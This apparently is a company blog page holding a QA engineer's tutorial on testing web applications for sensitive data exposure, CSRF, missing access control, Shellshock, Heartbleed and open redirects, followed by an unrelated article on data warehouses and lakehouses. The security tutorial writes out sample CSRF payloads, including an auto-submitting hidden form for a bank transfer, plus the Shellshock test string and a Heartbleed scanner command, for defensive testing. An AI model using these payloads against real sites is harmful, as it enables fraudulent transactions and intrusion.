Try : Insurtech, Application Development

AgriTech(1)

Augmented Reality(20)

Clean Tech(8)

Customer Journey(17)

Design(44)

Solar Industry(8)

User Experience(67)

Edtech(10)

Events(34)

HR Tech(3)

Interviews(10)

Life@mantra(11)

Logistics(5)

Strategy(18)

Testing(9)

Android(48)

Backend(32)

Dev Ops(11)

Enterprise Solution(29)

Technology Modernization(8)

Frontend(29)

iOS(43)

Javascript(15)

AI in Insurance(38)

Insurtech(66)

Product Innovation(57)

Solutions(22)

E-health(12)

HealthTech(24)

mHealth(5)

Telehealth Care(4)

Telemedicine(5)

Artificial Intelligence(146)

Bitcoin(8)

Blockchain(19)

Cognitive Computing(7)

Computer Vision(8)

Data Science(21)

FinTech(51)

Banking(7)

Intelligent Automation(27)

Machine Learning(47)

Natural Language Processing(14)

expand Menu Filters

[Part 2] Web Application Security Testing: Top 10 Risks & Solutions

By :
7 minutes, 29 seconds read

In the previous article, we discussed risks and web application security testing measures for 5 types of attacks-

  1. Injection
  2. Broken authentication and session management
  3. Cross-site scripting
  4. Indirect object security reference
  5. Security misconfiguration

Link – Part 1

Now let’s continue with the remaining 5 web application security threats.

6. Sensitive data exposure

Broken authentication and inefficient session management leads to sensitive data exposure. Examples of applications vulnerable to sensitive data exposure.

  • Data stored in plain text, such as passwords or credit card data 
  • Lack of HTTPS on authenticated pages
  • Hashed passwords with lack of salt, making the password easily cracked
  • Tokens disclosed in public source code
  • Browser header caching sensitive data

I would suggest going through the part 1 of this series for in-depth knowledge about this vulnerability.

7. Cross-site forgery

Cross-Site Request Forgery (CSRF) or session riding- attacks, an attacker forces a victim to make an inappropriate web request such as a fraudulent bank transaction. For example, an attacker tricks the victim client into calling a banking function in a vulnerable page that transfers money from the victim’s to the attacker’s account. The victim triggers the attack by following an attacker’s link or visiting an attacker’s page. The vulnerable server page doesn’t recheck the authenticity of the victim’s request and allows proceeding the transfer.

The following steps detail the anatomy of a CSRF attack:

  1. The attacker finds a functionality in a web application that is vulnerable to CSRF.
  2. Attacker builds a link invoking the vulnerable function and by passing the required parameters, executes the attack.
  3. The Attacker then waits until the victim client authenticates with the vulnerable web application.
  4. Attacker tricks the victim client into following the malicious link.
  5. Victim client sends a forged request to a vulnerable server.
  6. Vulnerable server allows and executes the forged request.

For example, the link might look like this when the payload is to transfer money from the victim’s to the attacker’s account:

/makeTransfer?amount=1000&dest=attacker@attackersite.com

The following link sends an email titled ‘Hello’ to johny@example.com – 

/sendMail?to=johny@example.com&title=Hello&body=I+did+not+send+this

Basic test for cross-site request forgery

You can follow these test steps to test against CSRF bugs-

  1. Find a web application page that triggers/performs an action upon user request.
  2. Construct a page containing a link or redirect that sends a forged request to the application server. This link usually contains a tag such as an img or iframe with the source address pointing to the request.

<a href=”http://bank.com/transfer.do?acct=MARIA&amount=100000″>View my Pictures!</a>

<img src=”http://bank.com/transfer.do?acct=MARIA&amount=100000″ width=”1″ height=”1″ border=”0″>

  1. Note that the links above will generate a GET request. In order to test for POST requests you must create a page containing a form with the URL parameters passed as hidden input, and add a script to automatically submit the form:
 <form action=”http://bank.com/transfer.do” method=”post”>
     <input type=”hidden” name=”acct” value=”MARIA”>
     <input type=”hidden” name=”ammount” value=”100000″>
</form>
<script>
     document.forms[0].submit();
</script>
  1. Open an Internet browser and log in to the web application as a legitimate user.
  2. Open the page built in step 2 (follow the link if necessary).
  3. Confirm if the request was successful.
  4. Repeat test case for every application create/update/delete/mail action.

Expected result: the test fails if the application trusts and processes the forged request.

Also, attackers can manipulate cookies.

Another example,

Suppose, we allow users to post images on our forum. What if one of our users post this image?

<img src= “http://foo.com/logout”>

This is not really an image. But, it will force the target URL to be retrieved by any random user who happens to browse that page — using their browser credentials! From the webserver’s perspective, there is no difference whatsoever between a real user initiated browser request and the above image URL retrieval.

If our logout page was a simple HTTP GET that requires no confirmation, every user who visits that page would be immediately logged out.

Consider these examples of cross-site forgery: CSRF token leakage through Google Analytics, deleting account and erasing imported contacts, change any user ZONE, Add optional two factor mobile number

8. Missing function level access control

If the authentication check in sensitive request handlers is insufficient or non-existent, the vulnerability is Missing Function Level Access Control.

How to test for missing function level access control?

The best way to find out if an application fails to properly restrict function level access is to verify every application function-

  1. Does the UI show navigation to unauthorized functions?
  2. Are server side authentication or authorization checks missing?
  3. Are server side checks solely rely on information provided by the attacker?

Using a proxy, browse the application with a privileged role. Then revisit restricted pages using a less privileged role. If the server responses are alike, the My Organization application is probably vulnerable.

In one potential scenario an attacker simply forces the browser to target URLs. Consider the following (non-My Organisation) URLs which should require authentication. One also requires admin rights to access the “admin_getappInfo” page.

http://example.com/app/getappInfo

http://example.com/app/admin_getappInfo

If a non-authentic user (attacker) gets access to either page, then it means — unauthorized access was allowed. This flaw may lead the attacker to access more unprotected admin pages.

Example of missing function level access control atack – Delete Credit Cards from any Twitter Account.

9. Shellshock and Heartbleed attacks

Shellshock

It is a remote command execution vulnerability in Bash. A series of random characters, () { :; }; , confuses Bash because it doesn’t know what to do with them, so by default, it executes the code after it.

More on — manually exploiting shellshock vulnerability

Tools for checking Shellshock

Through command line:

To determine if your Linux or Unix system is vulnerable, type the following in the command line-

 env x='() { :;}; echo vulnerable’ bash -c “echo this is a test”
If the system is vulnerable, the output will be:
 vulnerable
 this is a test
 An unaffected (or patched) system will output:
 bash: warning: x: ignoring function definition attempt
 bash: error importing function definition for `x’
           this is a test

Online tools – 

  1. Penetration testing tools
  2. Shellshock bash vulnerability test tool

Heartbleed

It is a critical bug in OpenSSL’s implementation of the TLS/DTLS heartbeat extension. It allows attackers to read portions of the affected server’s memory, potentially revealing users data, that the server did not intend to reveal.

An attacker can trick OpenSSL into allocating a 64KB buffer, copy more bytes than is necessary into the buffer, send that buffer back, and thus leak the contents of the victim’s memory, 64KB at a time.

Web application security testing tools for heartbleed attack

  1. defribulator v1.16 : Command→ python ssltest.py example.com (ssltest.py file is available with me)
  2. Online tool: Filippo
  3. For android, you can download Bluebox open SSL scanner

Also read – Heartbleed bug FAQs, Bugs and solutions

How to prevent heartbleed attack?

  • Upgrade the OpenSSL version to 1.0.1g
  • Request revocation of the current SSL certificate
  • Regenerate your private key
  • Request and replace the SSL certificate

Examples of Heartbleed security attacks: information disclosure on Concrete5, port 1433, server returning more data

10. Unvalidated redirects and forwards

Unvalidated redirect vulnerabilities occur when an attacker is able to redirect a user to an untrusted site when the user visits a link located on a trusted website. This vulnerability is also often called Open Redirect.

It is possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

How to test unvalidated redirects and forwards?

Spider the site to see if it generates any redirects (HTTP response codes 300-307, typically 302). Look at the parameters supplied prior to the redirect to see if they appear to be a target URL or a piece of such a URL. If so, change the URL target and observe whether the site redirects to the new target.

Web application security testing: preventing unvalidated redirects

  1. Simply avoid using redirects and forwards.
  2. If at all you’re using redirects/forwards, do not allow the url as user input for the destination. In this case, you should have a method to validate the URL.
  3. If you  cannot avoid user input, ensure that the supplied value is valid, appropriate for the application, and is authorized for the user.
  4. Map any such destination input to a value, rather than the actual URL or portion of the URL. Ensure that server side code translates this value to the target URL.
  5. Sanitize input by creating a list of trusted URL’s (lists of hosts or a regex).
  6. Force all redirects to first go through a page notifying users that they are going off of your site, and have them click a link to confirm.

Consider these examples: open redirect, open redirect in bulk edit

So, this was all about prevailing risks and web application security testing measures to prevent your website from attackers. For further queries & doubts, feel free to write to hello@mantralabsglobal.com

About the author: Rijin Raj is a Senior Software Engineer-QA at Mantra Labs, Bangalore. He is a seasoned tester and backbone of the organization with non-compromising attention to details.

Related:

Cancel

Knowledge thats worth delivered in your inbox

Lake, Lakehouse, or Warehouse? Picking the Perfect Data Playground

By :

In 1997, the world watched in awe as IBM’s Deep Blue, a machine designed to play chess, defeated world champion Garry Kasparov. This moment wasn’t just a milestone for technology; it was a profound demonstration of data’s potential. Deep Blue analyzed millions of structured moves to anticipate outcomes. But imagine if it had access to unstructured data—Kasparov’s interviews, emotions, and instinctive reactions. Would the game have unfolded differently?

This historic clash mirrors today’s challenge in data architectures: leveraging structured, unstructured, and hybrid data systems to stay ahead. Let’s explore the nuances between Data Warehouses, Data Lakes, and Data Lakehouses—and uncover how they empower organizations to make game-changing decisions.

Deep Blue’s triumph was rooted in its ability to process structured data—moves on the chessboard, sequences of play, and pre-defined rules. Similarly, in the business world, structured data forms the backbone of decision-making. Customer transaction histories, financial ledgers, and inventory records are the “chess moves” of enterprises, neatly organized into rows and columns, ready for analysis. But as businesses grew, so did their need for a system that could not only store this structured data but also transform it into actionable insights efficiently. This need birthed the data warehouse.

Why was Data Warehouse the Best Move on the Board?

Data warehouses act as the strategic command centers for enterprises. By employing a schema-on-write approach, they ensure data is cleaned, validated, and formatted before storage. This guarantees high accuracy and consistency, making them indispensable for industries like finance and healthcare. For instance, global banks rely on data warehouses to calculate real-time risk assessments or detect fraud—a necessity when billions of transactions are processed daily, tools like Amazon Redshift, Snowflake Data Warehouse, and Azure Data Warehouse are vital. Similarly, hospitals use them to streamline patient care by integrating records, billing, and treatment plans into unified dashboards.

The impact is evident: according to a report by Global Market Insights, the global data warehouse market is projected to reach $30.4 billion by 2025, driven by the growing demand for business intelligence and real-time analytics. Yet, much like Deep Blue’s limitations in analyzing Kasparov’s emotional state, data warehouses face challenges when encountering data that doesn’t fit neatly into predefined schemas.

The question remains—what happens when businesses need to explore data outside these structured confines? The next evolution takes us to the flexible and expansive realm of data lakes, designed to embrace unstructured chaos.

The True Depth of Data Lakes 

While structured data lays the foundation for traditional analytics, the modern business environment is far more complex, organizations today recognize the untapped potential in unstructured and semi-structured data. Social media conversations, customer reviews, IoT sensor feeds, audio recordings, and video content—these are the modern equivalents of Kasparov’s instinctive reactions and emotional expressions. They hold valuable insights but exist in forms that defy the rigid schemas of data warehouses.

Data lake is the system designed to embrace this chaos. Unlike warehouses, which demand structure upfront, data lakes operate on a schema-on-read approach, storing raw data in its native format until it’s needed for analysis. This flexibility makes data lakes ideal for capturing unstructured and semi-structured information. For example, Netflix uses data lakes to ingest billions of daily streaming logs, combining semi-structured metadata with unstructured viewing behaviors to deliver hyper-personalized recommendations. Similarly, Tesla stores vast amounts of raw sensor data from its autonomous vehicles in data lakes to train machine learning models.

However, this openness comes with challenges. Without proper governance, data lakes risk devolving into “data swamps,” where valuable insights are buried under poorly cataloged, duplicated, or irrelevant information. Forrester analysts estimate that 60%-73% of enterprise data goes unused for analytics, highlighting the governance gap in traditional lake implementations.

Is the Data Lakehouse the Best of Both Worlds?

This gap gave rise to the data lakehouse, a hybrid approach that marries the flexibility of data lakes with the structure and governance of warehouses. The lakehouse supports both structured and unstructured data, enabling real-time querying for business intelligence (BI) while also accommodating AI/ML workloads. Tools like Databricks Lakehouse and Snowflake Lakehouse integrate features like ACID transactions and unified metadata layers, ensuring data remains clean, compliant, and accessible.

Retailers, for instance, use lakehouses to analyze customer behavior in real time while simultaneously training AI models for predictive recommendations. Streaming services like Disney+ integrate structured subscriber data with unstructured viewing habits, enhancing personalization and engagement. In manufacturing, lakehouses process vast IoT sensor data alongside operational records, predicting maintenance needs and reducing downtime. According to a report by Databricks, organizations implementing lakehouse architectures have achieved up to 40% cost reductions and accelerated insights, proving their value as a future-ready data solution.

As businesses navigate this evolving data ecosystem, the choice between these architectures depends on their unique needs. Below is a comparison table highlighting the key attributes of data warehouses, data lakes, and data lakehouses:

FeatureData WarehouseData LakeData Lakehouse
Data TypeStructuredStructured, Semi-Structured, UnstructuredBoth
Schema ApproachSchema-on-WriteSchema-on-ReadBoth
Query PerformanceOptimized for BISlower; requires specialized toolsHigh performance for both BI and AI
AccessibilityEasy for analysts with SQL toolsRequires technical expertiseAccessible to both analysts and data scientists
Cost EfficiencyHighLowModerate
ScalabilityLimitedHighHigh
GovernanceStrongWeakStrong
Use CasesBI, ComplianceAI/ML, Data ExplorationReal-Time Analytics, Unified Workloads
Best Fit ForFinance, HealthcareMedia, IoT, ResearchRetail, E-commerce, Multi-Industry
Conclusion

The interplay between data warehouses, data lakes, and data lakehouses is a tale of adaptation and convergence. Just as IBM’s Deep Blue showcased the power of structured data but left questions about unstructured insights, businesses today must decide how to harness the vast potential of their data. From tools like Azure Data Lake, Amazon Redshift, and Snowflake Data Warehouse to advanced platforms like Databricks Lakehouse, the possibilities are limitless.

Ultimately, the path forward depends on an organization’s specific goals—whether optimizing BI, exploring AI/ML, or achieving unified analytics. The synergy of data engineering, data analytics, and database activity monitoring ensures that insights are not just generated but are actionable. To accelerate AI transformation journeys for evolving organizations, leveraging cutting-edge platforms like Snowflake combined with deep expertise is crucial.

At Mantra Labs, we specialize in crafting tailored data science and engineering solutions that empower businesses to achieve their analytics goals. Our experience with platforms like Snowflake and our deep domain expertise makes us the ideal partner for driving data-driven innovation and unlocking the next wave of growth for your enterprise.

Cancel

Knowledge thats worth delivered in your inbox

Loading More Posts ...
Go Top
ml floating chatbot